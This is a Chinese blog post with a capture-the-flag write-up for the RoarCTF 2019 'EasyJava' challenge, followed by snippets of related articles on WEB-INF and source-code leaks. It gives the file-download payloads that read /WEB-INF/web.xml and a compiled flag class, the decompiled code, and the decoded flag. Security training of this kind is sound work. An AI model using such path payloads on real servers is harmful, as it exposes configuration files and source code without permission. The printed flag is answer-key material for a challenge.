WEB-INF 泄露-RoarCTF-2019-EasyJava(BUUCTF)

已于 2024-07-11 13:24:31 修改
阅读量412 收藏 4
点赞数 3
分类专栏: CTF 文章标签: 网络安全
于 2024-07-11 13:20:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75030189/article/details/140348603
版权

题目页面

点开help

这里存在文件下载漏洞,参数选择POST传参(使用HackBar插件)

查看文件内容

下载存有web信息的XML文件,这里补充一点知识点

 WEB-INF主要包含一下文件或目录: 
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。 
/WEB-INF/database.properties:数据库配置文件

payload

filename=/WEB-INF/web.xml

servlet:Servlet(Server Applet)是Java Servlet的简称,称为小服务程序或服务连接器,用Java编写的服务器端程序,具有独立于平台和协议的特性,主要功能在于交互式地浏览和生成数据,生成动态Web内容。(来源百度百科)
其实说明了这个就是JAVA源代码进行编译后所产生的后缀带有.class的东西。于是我们可以下载这个.class文件再利用反编译手段来获得flag。

最终payload

filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

得到文件

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(
    name = "FlagController"
)
public class FlagController extends HttpServlet {
    String flag = "ZmxhZ3tkZjE5OTQyMy0zYjU1LTQyZWQtYWMxNS0zMWQwNzQwNjA4M2J9Cg==";

    public FlagController() {
    }

    protected void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
        PrintWriter var3 = var2.getWriter();
        var3.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
    }
}

然后将flag值进行base64解码

base64编码/解码 在线工具

flag{df199423-3b55-42ed-ac15-31d07406083b}

Hacker_seagull
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞挖掘】——62、WEB-INF/web.xml 泄露
Fly_鹏程万里
10-20 1521
WEB-INF/web.xml信息泄露是一种常见的安全问题,通常发生在Web应用程序未被正确配置或管理的情况下,攻击者可以通过暴力破解或者其他手段访问WEB-INF目录下的web.xml文件从而获得Web应用程序的配置信息,例如:安全配置、数据库连接信息、API密钥等。
详解直接访问WEB-INF目录下的JSP页面的方法
10-19
主要介绍了详解直接访问WEB-INF目录下的JSP页面的方法的相关资料,需要的朋友可以参考下
easy java (java WEB-INF/web.xml泄露)
aetlypdlg_ys的博客
03-29 301
WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。
Apache 上允许通过外网访问 /WEB-INF/web.xml 的漏洞
sinat_35855737的博客
08-14 651
原文链接
WEB-INF/web.xml泄露总结
王嘟嘟的博客
04-08 1万+
0x00 前言 WEB-INF/web.xml泄露漏洞的一些总结。 参考文章:http://www.anquan.us/static/drops/papers-60.html 0x01 基础知识 https://blog.csdn.net/qq_36869808/article/details/89084412 1.补充知识 Tomcat的WEB-INF目录,每个j2eeweb应用部署文件默认包...
常见web信息泄露
最新发布
黑战士的博客
10-03 1386
CVS是一个C/S系统,多个开发人员通过一个中心版本控制系统来记录文件版本,从而达到保证文件同步的目的。通过找到 web.xml 文件,推断 class 文件的路径,最后直接 class 文件,再通过反编译 class 文件,得到网站源码。是JavaWEB应用的安全目录,如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。临时文件是在编辑文本时就会创建的文件,如果程序正常退出,临时文件自动删除,如果意外退出就会保留,文件名为。
Java项目中如何访问WEB-INF下jsp页面
10-14
Java Web开发中,将JSP页面放置在`WEB-INF`目录下是一种常见的做法,主要目的是为了增强应用程序的安全性。因为Tomcat等Servlet容器默认不允许直接通过URL访问`WEB-INF`目录下的资源,这可以防止未经身份验证的...
JSP.rar_web-inf
09-23
根据Java Servlet规范,`WEB-INF`目录包含不直接对外公开的文件,如Servlet类、配置文件以及库(JAR文件)。这个目录下的文件不能通过URL直接访问,只能由Web应用内部的组件如Servlet或JSP页面访问,这增加了应用的...
SpringMVC如何访问WEB-INF jsp过程解析
10-14
在SpringMVC框架中,访问`WEB-INF`下的`jsp`页面是常见的需求,因为将视图文件放在`WEB-INF`目录下可以增加安全性,防止直接通过URL访问。本篇文章将详细解析SpringMVC访问`WEB-INF/jsp`的过程。 首先,让我们了解...
WEB-INF/web.xml泄露
m0_60715541的博客
11-05 1521
今天谈谈WEB-INF/web.xml泄露
WEB-INF中的web.xml中之前增加以下配置:
12-11
WEB-INF中的web.xml中之前增加以下配置:WEB-INF中的web.xml中之前增加以下配置:WEB-INF中的web.xml中之前增加以下配置:
WEB安全】详解信息泄漏漏洞
weixin_43025534的博客
05-30 2746
由于网站管理员运维不当,可能会将备份文件、数据库配置文件等敏感文件存放在WEB目录下公开访问,攻击者可以轻松地访问这些敏感文件,从而了解系统的配置细节、密码信息、数据库凭据等重要数据,扩大的攻击面。这种泄漏敏感信息的情况就属于信息泄漏漏洞。
WEB-INF/web.xml泄露漏洞及其利用
Mrs_H的博客
08-10 1万+
前言 之所以写这篇文章,是因为最近在做题的时候,做到了一个有关java的题目。因为对Java Web方面的开发经验很少,所以在做这道题的时候,查了一些关于Java Web相关的知识。感觉以后说不定还会用到,就以这篇文章来总结一下。 关于WEB-INF/web.xml 在了解WEB-INF/web.xml泄露之前,我们先要知道,web.xml是一个什么样的文件,以及它的泄露会出现哪些问题。 咱们先来看看WEB-INF这个文件夹 WEB-INF主要包含以下内容: /WEB-INF/web.xml:Web应用程
Web.xml配置文件泄露修复
dl1286670932的博客
12-21 3009
部署描述符文件描述了如何在 Servlet 容器(如 Tomcat)中部署 Web 应用程序。通常,此文件应该无法访问。但是,Acunetix WS能够通过使用各种编码和目录遍历变体来读取此文件的内容。由发现。
(CVE-2021-28164/CVE-2021-34429)Eclipse Jetty WEB-INF敏感信息泄露漏洞分析
weixin_50464560的博客
10-04 8182
本文主要从Jetty的两个WEB-INF信息泄露漏洞CVE-2021-28164和CVE-2021-34429,来分析如何通过编码和相对路径来绕过对敏感信息的校验,以及Jetty中对URL的PATH的解析方式和存在的问题。 漏洞信息 Jetty作为Eclipse基金会的一部分,是一个纯粹的基于Java的网页服务器和Java Servlet容器,其支持最新的Java Servlet API,同时支持WebSocket,SPDY,HTTP/2协议。 在Jetty9.4.37版本...
常见的Web源码泄漏漏洞及其利用
热门推荐
02-28 2万+
Web源码泄露的漏洞:git源码泄露svn源码泄露hg源码泄漏网站备份压缩文件WEB-INF/web.xml泄露DS_Store 文件泄露SWP 文件泄露CVS泄露Bzr泄露GitHu...
CTF中常见Web源码泄露总结
weixin_30491641的博客
01-30 745
.hg源码泄漏 漏洞成因: hg init的时候会生成.hg e.g.http://www.am0s.com/.hg/ 漏洞利用: 工具:dvcs-ripper rip-hg.pl -v -u http://www.am0s.com/.hg/ .git源码泄漏 漏洞成因: 在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用...
常见的Web源码泄漏漏洞
qq_50854662的博客
07-12 2420
常见的Web源码泄漏漏洞
Java访问WEB-INF下jsp页面
05-24
在标准的Java Web应用程序中,WEB-INF目录下的内容是受保护的,无法直接通过URL访问。因此,如果您想要访问WEB-INF下的JSP页面,最好将它们移动到Web根目录下。 如果您非常确定要访问WEB-INF下的JSP页面,可以通过以下方式: 1. 使用RequestDispatcher将请求分派到WEB-INF下的JSP页面: ```java String path = "/WEB-INF/test.jsp"; ServletContext servletContext = getServletContext(); RequestDispatcher requestDispatcher = servletContext.getRequestDispatcher(path); requestDispatcher.forward(request, response); ``` 2. 在web.xml文件中配置一个Servlet,以便将请求路由到WEB-INF下的JSP页面: ```xml <servlet> <servlet-name>test</servlet-name> <jsp-file>/WEB-INF/test.jsp</jsp-file> </servlet> <servlet-mapping> <servlet-name>test</servlet-name> <url-pattern>/test</url-pattern> </servlet-mapping> ``` 然后,您可以通过浏览器访问/test URL来访问WEB-INF下的JSP页面。 需要注意的是,这样做可能会破坏Web应用程序的安全性,因为WEB-INF目录下的文件是受保护的。因此,最好将JSP页面移动到Web根目录下,除非您有特别的理由需要访问WEB-INF目录下的JSP页面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值